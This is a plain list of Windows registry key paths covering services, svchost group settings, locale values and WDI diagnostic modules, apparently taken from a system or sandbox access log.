HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ObjectName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityParam
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\ImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationCapabilities
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityAppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DeferredCoInitializeSecurityServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\SystemCritical
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\Control Panel\International\sCountry
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceManifest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceMain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialSystemCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumSystemCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialUserCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumUserCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath
